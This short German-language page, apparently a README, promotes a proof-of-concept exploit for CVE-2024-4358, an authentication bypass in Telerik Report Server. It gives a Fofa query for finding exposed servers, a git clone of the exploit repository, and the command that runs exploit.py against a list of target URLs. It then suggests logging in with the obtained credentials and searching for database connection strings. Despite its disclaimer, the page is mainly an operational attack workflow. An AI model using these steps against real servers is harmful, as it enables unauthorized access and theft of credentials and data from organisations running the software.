
Authentifizierungs-Bypass-Sicherheitslücke — CVE-2024–4358 — Telerik Report Server 2024
Bei Progress Telerik Report Server, Version 2024 Q1 (10.0.24.305) oder früher, unter IIS, kann ein nicht authentifizierter Angreifer über eine Schwachstelle zur Umgehung der Authentifizierung Zugriff auf eingeschränkte Funktionen des Telerik Report Servers erhalten.
Lies mehr dazu – CVE-2024-4358
Haftungsausschluss: Dieses Proof of Concept (POC) dient ausschließlich Bildungs- und ethischen Testzwecken. Die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen und bundesstaatlichen Gesetze einzuhalten. Die Entwickler übernehmen keine Haftung und sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
Verwende Fofa (ähnlich wie Shodan.io), um potenzielle Ziele zu finden:
title="Telerik Report Server"
Klone zuerst das Repository:
git clone https://github.com/verylazytech/CVE-2024-4358
Wähle als Nächstes dein Ziel und füge es im folgenden Format zur Datei urls.txt hinzu:
Führe den Exploit aus:
python3 exploit.py -l urls.txt -c id -t 10

Und die Datei results.txt wird im Ordner gespeichert. Jetzt musst du dich nur noch mit den Anmeldedaten verbinden und nach interessanten Connection Strings suchen, um dich an der Datenbank anzumelden.